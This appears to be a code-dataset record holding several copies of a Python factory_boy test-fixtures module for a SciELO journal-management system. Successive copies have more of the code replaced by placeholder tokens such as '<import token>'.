href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. 
Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\n<assignment token>\nwith open(os.path.join(_HERE, 
'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. 
Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return 
cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n <assignment token>\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except 
IndexError:\n return 0\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment 
token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n 